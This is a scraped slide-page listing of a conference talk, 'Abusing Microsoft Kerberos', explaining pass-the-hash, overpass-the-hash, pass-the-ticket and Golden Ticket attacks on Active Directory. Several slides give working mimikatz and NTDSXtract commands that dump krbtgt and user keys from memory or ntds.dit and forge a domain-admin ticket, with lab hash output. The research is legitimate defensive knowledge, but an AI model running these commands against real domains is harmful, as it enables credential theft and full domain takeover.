Infrastructure review - Shining a light on the Black Box by
Infrastructure review - Shining a light on the Black BoxInfrastructure review - Shining a light on the Black Box
Infrastructure review - Shining a light on the Black BoxMiklos Szel
8 views39 slides
Modern Linux Tracing Landscape by
Modern Linux Tracing LandscapeModern Linux Tracing Landscape
Modern Linux Tracing LandscapeSasha Goldshtein
1.9K views30 slides
Tatu: ssh as a service by
Tatu: ssh as a serviceTatu: ssh as a service
Tatu: ssh as a servicePino deCandia
196 views24 slides
Cryptography for Absolute Beginners (May 2019) by
Cryptography for Absolute Beginners (May 2019)Cryptography for Absolute Beginners (May 2019)
Cryptography for Absolute Beginners (May 2019)Svetlin Nakov
1.9K views40 slides
Walking the Bifrost: An Operator's Guide to Heimdal & Kerberos on macOS by
Walking the Bifrost: An Operator's Guide to Heimdal & Kerberos on macOSWalking the Bifrost: An Operator's Guide to Heimdal & Kerberos on macOS
Walking the Bifrost: An Operator's Guide to Heimdal & Kerberos on macOSCody Thomas
1.3K views61 slides
USENIX ATC 2017 Performance Superpowers with Enhanced BPF by
USENIX ATC 2017 Performance Superpowers with Enhanced BPFUSENIX ATC 2017 Performance Superpowers with Enhanced BPF
USENIX ATC 2017 Performance Superpowers with Enhanced BPFBrendan Gregg
7.1K views60 slides

Similar to Abusing Microsoft Kerberos - Sorry you guys don't get it (20)

Ssh and sshfp dns records v04 by Bob Novas
Ssh and sshfp dns records v04Ssh and sshfp dns records v04
Ssh and sshfp dns records v04
Bob Novas640 views
Wce12 uba ampliasecurity_eng by fangjiafu
Wce12 uba ampliasecurity_engWce12 uba ampliasecurity_eng
Wce12 uba ampliasecurity_eng
fangjiafu538 views
BalCCon2k18 - Towards the perfect cryptocurrency wallet by Nemanja Nikodijević
BalCCon2k18 - Towards the perfect cryptocurrency walletBalCCon2k18 - Towards the perfect cryptocurrency wallet
BalCCon2k18 - Towards the perfect cryptocurrency wallet
Docker and friends at Linux Days 2014 in Prague by tomasbart
Docker and friends at Linux Days 2014 in PragueDocker and friends at Linux Days 2014 in Prague
Docker and friends at Linux Days 2014 in Prague
tomasbart2.8K views
Shutdown that bastion host! by MichaelLudvig
Shutdown that bastion host!Shutdown that bastion host!
Shutdown that bastion host!
MichaelLudvig31 views
In the Wake of Kerberoast by ken_kitahara
In the Wake of KerberoastIn the Wake of Kerberoast
In the Wake of Kerberoast
ken_kitahara834 views
Redis - for duplicate detection on real time stream by Codemotion
Redis - for duplicate detection on real time streamRedis - for duplicate detection on real time stream
Redis - for duplicate detection on real time stream
Codemotion3.8K views
Redis for duplicate detection on real time stream by Roberto Franchini
Redis for duplicate detection on real time streamRedis for duplicate detection on real time stream
Redis for duplicate detection on real time stream
Roberto Franchini7.5K views
Velocity 2017 Performance analysis superpowers with Linux eBPF by Brendan Gregg
Velocity 2017 Performance analysis superpowers with Linux eBPFVelocity 2017 Performance analysis superpowers with Linux eBPF
Velocity 2017 Performance analysis superpowers with Linux eBPF
Brendan Gregg737.1K views
BPF: Tracing and more by Brendan Gregg
BPF: Tracing and moreBPF: Tracing and more
BPF: Tracing and more
Brendan Gregg200.3K views
Adventures in Underland: Is encryption solid as a rock or a handful of dust? by Paula Januszkiewicz
Adventures in Underland: Is encryption solid as a rock or a handful of dust?Adventures in Underland: Is encryption solid as a rock or a handful of dust?
Adventures in Underland: Is encryption solid as a rock or a handful of dust?
Paula Januszkiewicz5.8K views
Infrastructure review - Shining a light on the Black Box by Miklos Szel
Infrastructure review - Shining a light on the Black BoxInfrastructure review - Shining a light on the Black Box
Infrastructure review - Shining a light on the Black Box
Miklos Szel8 views
Cryptography for Absolute Beginners (May 2019) by Svetlin Nakov
Cryptography for Absolute Beginners (May 2019)Cryptography for Absolute Beginners (May 2019)
Cryptography for Absolute Beginners (May 2019)
Svetlin Nakov1.9K views
Walking the Bifrost: An Operator's Guide to Heimdal & Kerberos on macOS by Cody Thomas
Walking the Bifrost: An Operator's Guide to Heimdal & Kerberos on macOSWalking the Bifrost: An Operator's Guide to Heimdal & Kerberos on macOS
Walking the Bifrost: An Operator's Guide to Heimdal & Kerberos on macOS
Cody Thomas1.3K views
USENIX ATC 2017 Performance Superpowers with Enhanced BPF by Brendan Gregg
USENIX ATC 2017 Performance Superpowers with Enhanced BPFUSENIX ATC 2017 Performance Superpowers with Enhanced BPF
USENIX ATC 2017 Performance Superpowers with Enhanced BPF
Brendan Gregg7.1K views

More from Benjamin Delpy

Cecyf / Coriin - mimikatz et la mémoire de Windows by
Cecyf / Coriin - mimikatz et la mémoire de WindowsCecyf / Coriin - mimikatz et la mémoire de Windows
Cecyf / Coriin - mimikatz et la mémoire de WindowsBenjamin Delpy
5K views36 slides
BlueHat 2014 - The Attacker's View of Windows Authentication and Post Exploit... by
BlueHat 2014 - The Attacker's View of Windows Authentication and Post Exploit...BlueHat 2014 - The Attacker's View of Windows Authentication and Post Exploit...
BlueHat 2014 - The Attacker's View of Windows Authentication and Post Exploit...Benjamin Delpy
29.4K views50 slides
mimikatz @ rmll by
mimikatz @ rmllmimikatz @ rmll
mimikatz @ rmllBenjamin Delpy
4.5K views30 slides
mimikatz @ sthack by
mimikatz @ sthackmimikatz @ sthack
mimikatz @ sthackBenjamin Delpy
7.6K views30 slides
mimikatz @ ossir by
mimikatz @ ossirmimikatz @ ossir
mimikatz @ ossirBenjamin Delpy
11.7K views19 slides
mimikatz @ asfws by
mimikatz @ asfwsmimikatz @ asfws
mimikatz @ asfwsBenjamin Delpy
24.9K views57 slides
mimikatz @ phdays by
mimikatz @ phdaysmimikatz @ phdays
mimikatz @ phdaysBenjamin Delpy
16.1K views51 slides

More from Benjamin Delpy (7)

Cecyf / Coriin - mimikatz et la mémoire de Windows by Benjamin Delpy
Cecyf / Coriin - mimikatz et la mémoire de WindowsCecyf / Coriin - mimikatz et la mémoire de Windows
Cecyf / Coriin - mimikatz et la mémoire de Windows
Benjamin Delpy5K views
BlueHat 2014 - The Attacker's View of Windows Authentication and Post Exploit... by Benjamin Delpy
BlueHat 2014 - The Attacker's View of Windows Authentication and Post Exploit...BlueHat 2014 - The Attacker's View of Windows Authentication and Post Exploit...
BlueHat 2014 - The Attacker's View of Windows Authentication and Post Exploit...
Benjamin Delpy29.4K views

Recently uploaded

Building Learning to Rank (LTR) search reranking models using Large Language ... by
Building Learning to Rank (LTR) search reranking models using Large Language ...Building Learning to Rank (LTR) search reranking models using Large Language ...
Building Learning to Rank (LTR) search reranking models using Large Language ...Sujit Pal
53 views35 slides
The Mysterious Paradigm of Fuzzing by Rakesh Seal by
The Mysterious Paradigm of Fuzzing by Rakesh SealThe Mysterious Paradigm of Fuzzing by Rakesh Seal
The Mysterious Paradigm of Fuzzing by Rakesh Sealnull - The Open Security Community
20 views11 slides
Choosing the Right Flutter App Development Company by
Choosing the Right Flutter App Development CompanyChoosing the Right Flutter App Development Company
Choosing the Right Flutter App Development CompanyFicode Technologies
19 views9 slides
PCCC23:日本AMD株式会社 テーマ2「AMD EPYC™ プロセッサーを用いたAIソリューション」 by
PCCC23:日本AMD株式会社 テーマ2「AMD EPYC™ プロセッサーを用いたAIソリューション」PCCC23:日本AMD株式会社 テーマ2「AMD EPYC™ プロセッサーを用いたAIソリューション」
PCCC23:日本AMD株式会社 テーマ2「AMD EPYC™ プロセッサーを用いたAIソリューション」PC Cluster Consortium
43 views12 slides
Transcript: Show and tell: What’s in your tech stack? - Tech Forum 2023 by
Transcript: Show and tell: What’s in your tech stack? - Tech Forum 2023Transcript: Show and tell: What’s in your tech stack? - Tech Forum 2023
Transcript: Show and tell: What’s in your tech stack? - Tech Forum 2023BookNet Canada
41 views16 slides
A plenarily integrated SIEM solution and it’s Deployment by
A plenarily integrated SIEM solution and it’s DeploymentA plenarily integrated SIEM solution and it’s Deployment
A plenarily integrated SIEM solution and it’s DeploymentBangladesh Network Operators Group
42 views26 slides
Measuring User on the web with the core web vitals - by @theafolayan.pptx by
Measuring User on the web with the core web vitals - by @theafolayan.pptxMeasuring User on the web with the core web vitals - by @theafolayan.pptx
Measuring User on the web with the core web vitals - by @theafolayan.pptxOluwaseun Raphael Afolayan
15 views13 slides
User Centred Design and Implementation of Useful Picture Archiving and Commun... by
User Centred Design and Implementation of Useful Picture Archiving and Commun...User Centred Design and Implementation of Useful Picture Archiving and Commun...
User Centred Design and Implementation of Useful Picture Archiving and Commun...Lighton Phiri
24 views26 slides
AI + Memoori = AIM by
AI + Memoori = AIMAI + Memoori = AIM
AI + Memoori = AIMMemoori
41 views9 slides
Modern Database Best Practices by
Modern Database Best PracticesModern Database Best Practices
Modern Database Best PracticesAll Things Open
40 views55 slides
Cocktail of Environments. How to Mix Test and Development Environments and St... by
Cocktail of Environments. How to Mix Test and Development Environments and St...Cocktail of Environments. How to Mix Test and Development Environments and St...
Cocktail of Environments. How to Mix Test and Development Environments and St...Aleksandr Tarasov
27 views135 slides
The Power of Generative AI in Accelerating No Code Adoption.pdf by
The Power of Generative AI in Accelerating No Code Adoption.pdfThe Power of Generative AI in Accelerating No Code Adoption.pdf
The Power of Generative AI in Accelerating No Code Adoption.pdfSaeed Al Dhaheri
58 views18 slides
Discover Aura Workshop (12.5.23).pdf by
Discover Aura Workshop (12.5.23).pdfDiscover Aura Workshop (12.5.23).pdf
Discover Aura Workshop (12.5.23).pdfNeo4j
28 views55 slides
What is Authentication Active Directory_.pptx by
What is Authentication Active Directory_.pptxWhat is Authentication Active Directory_.pptx
What is Authentication Active Directory_.pptxHeenaMehta35
31 views7 slides
Flutter vs React Native: Analyzing the Popularity and Trends by
Flutter vs React Native: Analyzing the Popularity and TrendsFlutter vs React Native: Analyzing the Popularity and Trends
Flutter vs React Native: Analyzing the Popularity and TrendsCMARIX TechnoLabs
16 views5 slides
Measurecamp Brussels - Synthetic data.pdf by
Measurecamp Brussels - Synthetic data.pdfMeasurecamp Brussels - Synthetic data.pdf
Measurecamp Brussels - Synthetic data.pdfHuman37
34 views14 slides
Five Ways to Automate API Testing with Postman by
Five Ways to Automate API Testing with PostmanFive Ways to Automate API Testing with Postman
Five Ways to Automate API Testing with PostmanPostman
48 views31 slides
Business Analyst Series 2023 - Week 4 Session 8 by
Business Analyst Series 2023 -  Week 4 Session 8Business Analyst Series 2023 -  Week 4 Session 8
Business Analyst Series 2023 - Week 4 Session 8DianaGray10
238 views13 slides
Qualifying SaaS, IaaS.pptx by
Qualifying SaaS, IaaS.pptxQualifying SaaS, IaaS.pptx
Qualifying SaaS, IaaS.pptxSachin Bhandari
1.2K views8 slides
Network eWaste : Community role to manage end of life Product by
Network eWaste : Community role to manage end of life ProductNetwork eWaste : Community role to manage end of life Product
Network eWaste : Community role to manage end of life ProductBangladesh Network Operators Group
26 views13 slides

Recently uploaded (20)

Building Learning to Rank (LTR) search reranking models using Large Language ... by Sujit Pal
Building Learning to Rank (LTR) search reranking models using Large Language ...Building Learning to Rank (LTR) search reranking models using Large Language ...
Building Learning to Rank (LTR) search reranking models using Large Language ...
Sujit Pal53 views
PCCC23:日本AMD株式会社 テーマ2「AMD EPYC™ プロセッサーを用いたAIソリューション」 by PC Cluster Consortium
PCCC23:日本AMD株式会社 テーマ2「AMD EPYC™ プロセッサーを用いたAIソリューション」PCCC23:日本AMD株式会社 テーマ2「AMD EPYC™ プロセッサーを用いたAIソリューション」
PCCC23:日本AMD株式会社 テーマ2「AMD EPYC™ プロセッサーを用いたAIソリューション」
Transcript: Show and tell: What’s in your tech stack? - Tech Forum 2023 by BookNet Canada
Transcript: Show and tell: What’s in your tech stack? - Tech Forum 2023Transcript: Show and tell: What’s in your tech stack? - Tech Forum 2023
Transcript: Show and tell: What’s in your tech stack? - Tech Forum 2023
BookNet Canada41 views
User Centred Design and Implementation of Useful Picture Archiving and Commun... by Lighton Phiri
User Centred Design and Implementation of Useful Picture Archiving and Commun...User Centred Design and Implementation of Useful Picture Archiving and Commun...
User Centred Design and Implementation of Useful Picture Archiving and Commun...
Lighton Phiri24 views
AI + Memoori = AIM by Memoori
AI + Memoori = AIMAI + Memoori = AIM
AI + Memoori = AIM
Memoori41 views
Cocktail of Environments. How to Mix Test and Development Environments and St... by Aleksandr Tarasov
Cocktail of Environments. How to Mix Test and Development Environments and St...Cocktail of Environments. How to Mix Test and Development Environments and St...
Cocktail of Environments. How to Mix Test and Development Environments and St...
The Power of Generative AI in Accelerating No Code Adoption.pdf by Saeed Al Dhaheri
The Power of Generative AI in Accelerating No Code Adoption.pdfThe Power of Generative AI in Accelerating No Code Adoption.pdf
The Power of Generative AI in Accelerating No Code Adoption.pdf
Saeed Al Dhaheri58 views
Discover Aura Workshop (12.5.23).pdf by Neo4j
Discover Aura Workshop (12.5.23).pdfDiscover Aura Workshop (12.5.23).pdf
Discover Aura Workshop (12.5.23).pdf
Neo4j28 views
What is Authentication Active Directory_.pptx by HeenaMehta35
What is Authentication Active Directory_.pptxWhat is Authentication Active Directory_.pptx
What is Authentication Active Directory_.pptx
HeenaMehta3531 views
Flutter vs React Native: Analyzing the Popularity and Trends by CMARIX TechnoLabs
Flutter vs React Native: Analyzing the Popularity and TrendsFlutter vs React Native: Analyzing the Popularity and Trends
Flutter vs React Native: Analyzing the Popularity and Trends
Measurecamp Brussels - Synthetic data.pdf by Human37
Measurecamp Brussels - Synthetic data.pdfMeasurecamp Brussels - Synthetic data.pdf
Measurecamp Brussels - Synthetic data.pdf
Human37 34 views
Five Ways to Automate API Testing with Postman by Postman
Five Ways to Automate API Testing with PostmanFive Ways to Automate API Testing with Postman
Five Ways to Automate API Testing with Postman
Postman48 views
Business Analyst Series 2023 - Week 4 Session 8 by DianaGray10
Business Analyst Series 2023 -  Week 4 Session 8Business Analyst Series 2023 -  Week 4 Session 8
Business Analyst Series 2023 - Week 4 Session 8
DianaGray10238 views

Abusing Microsoft Kerberos - Sorry you guys don't get it

  • 1. by Alva `Skip` DUCKWALL & Benjamin DELPY Abusing Microsoft Kerberos sorry you guys don’t get it
  • 2. • Alva `Skip` DUCKWALL @ passingthehash http://passing-the-hash.blogspot.com author of papers about Pass-the-hash & Kerberos Dude in a basement somewhere `whoami` - Skip
  • 3. • Benjamin DELPY @gentilkiwi https://github.com/gentilkiwi http://blog.gentilkiwi.com author of mimikatz is certainly admin of your domain `whoami` - gentilkiwi
  • 4. • We’ll speak about: – Windows, Active Directory – mimikatz – NTLM Hash – Kerberos – Pass-the-hash/keys/ticket – Golden Ticket • We’ll try: 3 live demos. – All of that also works from a non domain-joined computer.
  • 5. Remember about Pass-The-Hash? It still works… despite what the Microsoft KB or Russinovich says
  • 6. • Normal • Pass-the-Hash A little reminder waza 1234/ NTLM (md4) LM cc36cf7a8514893e fccd332446158b1a d0e9aee149655a60 75e4540af1f22d3b LSASS (msv1_0) NTLM (md4) LM cc36cf7a8514893e fccd332446158b1a LSASS (msv1_0) cc36cf7a8514893e fccd332446158b1a
  • 7. Cool isn’t it ? And it works like a charm but with NTLM disabled or “Protected Users”?
  • 8. *or maybe you only don’t want to leave NTLM auth footprints in the Eventlog ;)
  • 9. • It is all about keys and tickets • For Example, let’s use Administrateur who wants to access cifs on a win81 machine on chocolate.local domain • It needs 3 set of keys, all are in the Active Directory – And by default, derived from password. Kerberos
  • 10. 1. The KDC long-term secret key (domain key) – Under the mysterious krbtgt account (rc4, aes128, aes256, des…) – Needed to sign Microsoft specific data in “PAC”, encrypt TGT 2. The Client long-term secret key (derived from password) – Under the user/computer/server account – Needed to check AS-REQ, encrypt session key 3. The Target/Service long-term secret key (derived from password) – Under the computer/server account – Needed to countersign data in “PAC” of TGS, encrypt TGS Kerberos :: keys
  • 11. • Normal Kerberos waza 1234/ des_cbc_md5 f8fd987fa7153185 LSASS (kerberos) for « chocolate.local » domain rc4_hmac_nt (NTLM/md4) cc36cf7a8514893e fccd332446158b1a aes128_hmac 8451bb37aa6d7ce3 d2a5c2d24d317af3 aes256_hmac b726836138609031 4acce8d9367e55f5 5865e7ef8e670fbe 4262d6c94098a9e9 KDC KDC TGT TGS ③ TGS-REQ ④ TGS-REP ⑤ Usage Administrateur win81
  • 12. • The KDC will validate the authentication if it can decrypt the timestamp with the long-term user key (for RC4, the NTLM hash of the user password) • It issues a TGT representing the user in the domain, for a specified period Kerberos :: preauth RID : 000001f4 (500) User : Administrateur * Primary LM : NTLM : cc36cf7a8514893efccd332446158b1a * Kerberos-Newer-Keys Default Salt : CHOCOLATE.LOCALAdministrateur Default Iterations : 4096 Credentials aes256_hmac (4096) : b7268361386090314acce8d9367e55f5 5865e7ef8e670fbe4262d6c94098a9e9 aes128_hmac (4096) : 8451bb37aa6d7ce3d2a5c2d24d317af3 des_cbc_md5 (4096) : f8fd987fa7153185 KDC waza 1234/ rc4_hmac_nt (NTLM/md4) cc36cf7a8514893e fccd332446158b1a 20140807054500Z timestamp ① AS-REQ ② AS-REPTGT
  • 13. • This TGT is encrypted with a key shared between all KDC – The RC4 key for the krbtgt account : 310b643c5316c8c3c70a10cfb17e2e31 • The KDC adds a Microsoft specific PAC to a structure with user’s information Kerberos :: TGT RID : 000001f6 (502) User : krbtgt * Primary LM : NTLM : 310b643c5316c8c3c70a10cfb17e2e31 * Kerberos-Newer-Keys Default Salt : CHOCOLATE.LOCALkrbtgt Default Iterations : 4096 Credentials aes256_hmac (4096) : 15540cac73e94028231ef86631bc47bd 5c827847ade468d6f6f739eb00c68e42 aes128_hmac (4096) : da3128afc899a298b72d365bd753dbfb des_cbc_md5 (4096) : 620eb39e450e6776 KDC TGT Start/End/MaxRenew: 14/07/2014 00:46:09 ; 14/07/2014 10:46:09 ; 21/07/2014 00:46:09 Service Name (02) : krbtgt ; CHOCOLATE.LOCAL ; @ CHOCOLATE.LOCAL Target Name (02) : krbtgt ; CHOCOLATE ; @ CHOCOLATE.LOCAL Client Name (01) : Administrateur ; @ CHOCOLATE.LOCAL ( CHOCOLATE ) Flags 40e10000 : name_canonicalize ; pre_authent ; initial ; renewable ; forwardable ; Session Key : 0x00000012 - aes256_hmac f3bf2e0e26903703bec6259b400a586f403bbfe3771cb7972be3c 0868cb9cc69 RC4-HMAC – krbtgt 310b643c5316c8c3c70a10cfb17e2e31 Username : Administrateur Domain SID S-1-5-21-130452501-2365100805-3685010670 Authorization data Microsoft (PAC) CHECKSUM_SRV – HMAC_MD5 - krbtgt 310b643c5316c8c3c70a10cfb17e2e3 CHECKSUM_KDC – HMAC_MD5 - krbtgt 310b643c5316c8c3c70a10cfb17e2e3
  • 14. • The KDC will create a Microsoft specific structure (PAC) with user information • This PAC is signed with the target key, and the KDC key – for a TGT, the target is also the KDC, so it is the same key, 310b643c5316c8c3c70a10cfb17e2e31 for RC4 – KDC keys are in the krbtgt account Kerberos :: TGT :: PAC RID : 000001f6 (502) User : krbtgt * Primary LM : NTLM : 310b643c5316c8c3c70a10cfb17e2e31 * Kerberos-Newer-Keys Default Salt : CHOCOLATE.LOCALkrbtgt Default Iterations : 4096 Credentials aes256_hmac (4096) : 15540cac73e94028231ef86631bc47bd 5c827847ade468d6f6f739eb00c68e42 aes128_hmac (4096) : da3128afc899a298b72d365bd753dbfb des_cbc_md5 (4096) : 620eb39e450e6776 KDC Username : Administrateur Domain SID S-1-5-21-130452501-2365100805-3685010670 User ID 500 Administrateur Groups ID 512 Admins du domaine 519 Administrateurs de l’entreprise 518 Administrateurs du schéma … Authorization data Microsoft (PAC) CHECKSUM_SRV – HMAC_MD5 - krbtgt 310b643c5316c8c3c70a10cfb17e2e3 CHECKSUM_KDC – HMAC_MD5 - krbtgt 310b643c5316c8c3c70a10cfb17e2e3
  • 15. Kerberos :: KRBTGT RID : 000001f6 (502) User : krbtgt * Primary LM : NTLM : 310b643c5316c8c3c70a10cfb17e2e31 * Kerberos-Newer-Keys Default Salt : CHOCOLATE.LOCALkrbtgt Default Iterations : 4096 Credenti aes256_hmac (4096) : 15540cac73e94028231ef86631bc47bd 5c827847ade468d6f6f739eb00c68e42 aes128_hmac (4096) : da3128afc899a298b72d365bd753dbfb des_cbc_md5 (4096) : 620eb39e450e6776 • KRBTGT account pwd / hash only changes: – Upgrade of domain functional level (NT5->NT6) – Bare metal recovery using restore media – Manually changed (compromise recovery) – In most enterprises this password hasn’t changed in YEARS
  • 16. • All of that is not secret ! – Tickets are ASN.1 encoded • Use OpenSSL or your favorite tool – Kerberos ticket (and KRB-CRED format) • http://www.ietf.org/rfc/rfc4120.txt – Microsoft Specific PAC • http://msdn.microsoft.com/library/cc237917.aspx Kerberos :: internal
  • 18. • Overpass-the-Hash or Pass-the-Key ;) Kerberos des_cbc_md5 LSASS (kerberos) for « chocolate.local » domain rc4_hmac_nt (NTLM/md4) cc36cf7a8514893e fccd332446158b1a aes128_hmac aes256_hmac KDC KDC TGT TGS ③ TGS-REQ ④ TGS-REP ⑤ Usage cc36cf7a8514893e fccd332446158b1a
  • 19. • Overpass-the-Hash or Pass-the-Key ;) not limited to RC4 ! Kerberos des_cbc_md5 LSASS (kerberos) for « chocolate.local » domain rc4_hmac_nt (NTLM/md4) aes128_hmac aes256_hmac KDC KDC TGT TGS ③ TGS-REQ ④ TGS-REP ⑤ Usage b726836138609031 4acce8d9367e55f5 5865e7ef8e670fbe 4262d6c94098a9e9 b726836138609031 4acce8d9367e55f5 5865e7ef8e670fbe 4262d6c94098a9e9
  • 20. “Ok, Skip, Kiwi, it’s cool… but how can we find these keys?”
  • 21. • Keys are both in Active Directory and client LSASS memory • We can find: – DES key – RC4 key…. Yep, this is the NTLM hash of the password, no domain salt! • Sorry Microsoft, we don’t get it, but your RFC yes ;) - http://www.ietf.org/rfc/rfc4757.txt – AES128 & AES256 keys (with NT 6) • New “protected users” group prevents Keys in client LSASS memory – Of course not on the DC ;) Kerberos :: Overpass-the-hash
  • 22. • AES Keys use PBKDF2 – These hashes are salted – 4096 iterations of the PBKDF2 algorithm – Difficult to crack • Of course these hashes are cached in memory on the client side and then used as password equivalents, just like the NT hashes • This is how you fail with strong cryptography Kerberos :: AES Keys
  • 23. • From Active Directory : Offline – “just” need : ntds.dit & SYSTEM hive – NTDSXtract : http://www.ntdsxtract.com • python dsusers.py ntds.dit.export/datatable.4 ntds.dit.export/link_table.7 ./work --name Administrateur --syshive SYSTEM --supplcreds --passwordhashes --lmoutfile ./lm --ntoutfile ./nt --pwdformat john Kerberos :: Overpass-the-hash User name: Administrateur [...] Password hashes: Administrateur:$NT$cc36cf7a8514893efccd332446158b1a::: Supplemental credentials: Kerberos newer keys salt: CHOCOLATE.LOCALAdministrateur Credentials 18 b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9 17 8451bb37aa6d7ce3d2a5c2d24d317af3 3 f8fd987fa7153185
  • 24. • From Active Directory : Online Kerberos :: Overpass-the-hash mimikatz # privilege::debug Privilege '20' OK mimikatz # lsadump::lsa /inject /name:Administrateur Domain : CHOCOLATE / S-1-5-21-130452501-2365100805-3685010670 RID : 000001f4 (500) User : Administrateur * Primary LM : NTLM : cc36cf7a8514893efccd332446158b1a [...] * Kerberos-Newer-Keys Default Salt : CHOCOLATE.LOCALAdministrateur Default Iterations : 4096 Credentials aes256_hmac (4096) : b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9 aes128_hmac (4096) : 8451bb37aa6d7ce3d2a5c2d24d317af3 des_cbc_md5 (4096) : f8fd987fa7153185
  • 25. • From client LSASS memory Kerberos :: Overpass-the-hash mimikatz # privilege::debug Privilege '20' OK mimikatz # sekurlsa::ekeys Authentication Id : 0 ; 1616704 (00000000:0018ab40) Session : Interactive from 2 User Name : Administrateur Domain : CHOCOLATE SID : S-1-5-21-130452501-2365100805-3685010670-500 * Username : Administrateur * Domain : CHOCOLATE.LOCAL * Password : (null) * Key List : aes256_hmac b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9 rc4_hmac_nt cc36cf7a8514893efccd332446158b1a
  • 26. • Overpass-the-hash ! – mimikatz now supports pass-the-hash for both NTLM & Kerberos provider! Kerberos :: Overpass-the-hash mimikatz # privilege::debug Privilege '20' OK mimikatz # sekurlsa::pth /user:Administrateur /domain:chocolate.local /ntlm:cc36cf7a8514893efccd332446158b1a user : Administrateur domain : chocolate.local program : cmd.exe NTLM : cc36cf7a8514893efccd332446158b1a | PID 2388 | TID 2392 | LUID 0 ; 264419 (00000000:000408e3) _ msv1_0 - data copy @ 00000000003C7BC0 : OK ! _ kerberos - data copy @ 0000000000435988 _ aes256_hmac -> null _ aes128_hmac -> null _ rc4_hmac_nt OK _ rc4_hmac_old OK _ rc4_md4 OK _ rc4_hmac_nt_exp OK _ rc4_hmac_old_exp OK _ *Password replace -> null Old pass-the-hash for NTLM protocol New pass-the-hash for Kerberos protocol
  • 27. ~ demo ! ~
  • 28. • By the way, this is exactly how Aorato POC works for changing password with just NTLM hash! – They send a Kerberos request to the service : kadmin/changepw • http://www.aorato.com/blog/active-directory-vulnerability- disclosure-weak-encryption-enables-attacker-change-victims- password-without-logged/ Kerberos :: Overpass-the-hash (more…)
  • 30. • Pass-the-Ticket Kerberos des_cbc_md5 LSASS (kerberos) for « chocolate.local » domain rc4_hmac_nt (NTLM/md4) aes128_hmac aes256_hmac KDC KDC TGT TGS ③ TGS-REQ ④ TGS-REP ⑤ Usage TGT
  • 31. • Pass-the-Ticket also with TGS! Kerberos des_cbc_md5 LSASS (kerberos) for « chocolate.local » domain rc4_hmac_nt (NTLM/md4) aes128_hmac aes256_hmac KDC KDC TGS ③ TGS-REQ ④ TGS-REP ⑤ Usage TGS
  • 32. “Ok, Skip, Kiwi, it’s cool… but how can we find these tickets?”
  • 33. • TGT & TGS are in client LSASS memory – The “normal” way: by API • User can only export their ticket(s) (without privilege) • For TGT: AllowTgtSessionKey registry key must be set for session key export… – (mandatory to use the TGT) • For TGS: no restriction at all! – To get tickets : LsaCallAuthenticationPackage/KerbRetrieveEncodedTicketMessage • In mimikatz: kerberos::list [/export] – To pass-the-ticket : LsaCallAuthenticationPackage/KerbSubmitTicketMessage • In mimikatz: kerberos::ptt ticket.kirbi Not a hack : http://msdn.microsoft.com/library/windows/desktop/aa378099.aspx Kerberos :: TGT & TGS
  • 34. • Ok, but I want other people’s TGT & TGS ! Why do you want that? Are you a hacker? – Raw memory reading (yep, even with minidump!) – This time with all session keys Kerberos :: TGT & TGS
  • 35. • In mimikatz : – privilege::debug • (if not already SYSTEM) – sekurlsa::tickets /export • Make your choice ! • Then use it : – kerberos::ptt ticket.kirbi Kerberos :: TGT & TGS
  • 36. ~ demo ! ~
  • 37. * No encryption check for THE domain administrator (id==500) ! No worry, this account is not sensitive ;) ** Not in memory when user in « Protected Users » group Kerberos :: make your choice Default lifetime Minimum number of KDC accesses Multiple targets Available with Smartcard Realtime check for restrictions (account disabled, logon hours...) Protected Users Check for Encryption * (RC4/AES) Can be found in Is funky Normal 42 days 2 Yes Yes Yes Yes n.a. No Overpass-the-hash (Pass-the-key) 42 days 2 Yes No Yes Yes Active Directory Client Memory ** No (ok, a little;)) Pass-the-Ticket (TGT) 10 hours 1 Yes Yes No (20mn after) No Client Memory Yes Pass-the-Ticket (TGS) 10 hours 0 No Yes No No Client Memory Yes Golden Ticket 10 years 1 Yes Yes No (we can cheat) No n.a. Fuck, Yes!
  • 39. • A “Golden Ticket”, is a homemade ticket – It’s done with a lot of love – … and a key • It’s not made by the KDC, so : – it’s not limited by GPO or others settings ;) – you can push whatever you want inside! – it’s smartcard independent (sorry CISO !) Kerberos :: Golden Ticket
  • 40. • …but a golden ticket is not only about lifetime modification (10 years is hardcoded but can be modified) • Interesting part is about to modify data into, like lifetime, but mainly the Microsoft PAC : – Groups (Domain/Enterprise Admins, by example ;) – SID – Username Kerberos :: Golden Ticket
  • 41. • Kerberos is STATELESS – All account policy info is in the TGT • Disabled / Expired / outside of logon hours • Password expired • Authentication silo membership • “Protected Users” is just a group membership in the PAC • Group Membership in the PAC – This means that ALL account policy is Client Side Enforcement Kerberos :: AD Account Policy
  • 42. • Kerberos 5 has no method for the KDC/TGS (server) to validate that an account is still valid when presented with a TGT – Microsoft implemented a solution for this problem – IF the TGT is older than 20 minutes, the KDC will validate the account is still valid / enabled before issuing service tickets • We will come back to this later  Kerberos :: 20 Minute Rule
  • 43. • Even if the technique remains the same, I’ve made the choice to limit it to TGT (no TGS) – Why ? Because TGT and TGS rely on different keys – target key is renewed periodically, krbtgt… ~never  – A single TGT can obtain many TGS Kerberos :: Golden Ticket Ticket Encryption PAC KDC Signature PAC Server Signature TGT krbtgt krbtgt krbtgt TGS target krbtgt target
  • 44. • All you need is : – KDC Key (krbtgt), it can be RC4 (NTLM hash) or AES – SID of the domain (whoami, psgetsid, etc.) – Domain name Kerberos :: Golden Ticket mimikatz # lsadump::lsa /inject /name:krbtgt Domain : CHOCOLATE / S-1-5-21-130452501-2365100805-3685010670 * Primary LM : NTLM : 310b643c5316c8c3c70a10cfb17e2e31 * Kerberos-Newer-Keys Default Salt : CHOCOLATE.LOCALkrbtgt Default Iterations : 4096 Credentials aes256_hmac (4096) : 15540cac73e94028231ef86631bc47bd5c827847ade468d6f6f739eb00c68e42 aes128_hmac (4096) : da3128afc899a298b72d365bd753dbfb des_cbc_md5 (4096) : 620eb39e450e6776
  • 45. • Create your own ! • kerberos::golden /domain:chocolate.local <= domain name /sid:S-1-5-21-130452501-2365100805-3685010670 <= domain SID /rc4:310b643c5316c8c3c70a10cfb17e2e31 <= NTLM hash of krbtgt /user:Administrateur <= username you wanna be /id:500 <= RID of username (500 is THE domain admin) /groups:513,512,520,518,519 <= Groups list of the user (be imaginative) /ticket:Administrateur.kirbi <= the ticket filename Kerberos :: Golden Ticket
